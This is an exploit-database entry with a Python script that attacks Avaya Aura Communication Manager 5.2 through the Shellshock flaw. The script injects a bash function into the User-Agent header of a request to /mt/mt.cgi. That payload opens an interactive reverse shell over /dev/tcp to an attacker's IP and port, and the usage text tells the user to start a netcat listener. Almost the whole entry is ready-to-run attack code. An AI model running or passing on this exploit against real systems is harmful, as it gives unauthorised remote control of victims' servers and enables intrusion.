Avaya Aura Communication Manager 5.2 - Remote Code Execution

Author: Sarang Tumne
type: webapps
platform: hardware
port: 
date_added: 2020-02-17 
date_updated: 2020-02-17 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)

###############################################

#!/usr/bin/python

import sys
import requests

if len(sys.argv) < 4:
	print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
	print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
	print "[*] Netcat Listener: nc -lvvnp <port>"
	print "\n"
	sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]

http_headers = {

		"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'

		}

def main():
		if len(sys.argv) == 4:

		  print "[+] Success, spawning a shell on your custom port :)..."
		  requests.get(url, headers=http_headers, verify=False, timeout=5)

		else:
		  print "[-] Something went wrong, quitting..."

		sys.exit()


if __name__ == "__main__":
	main()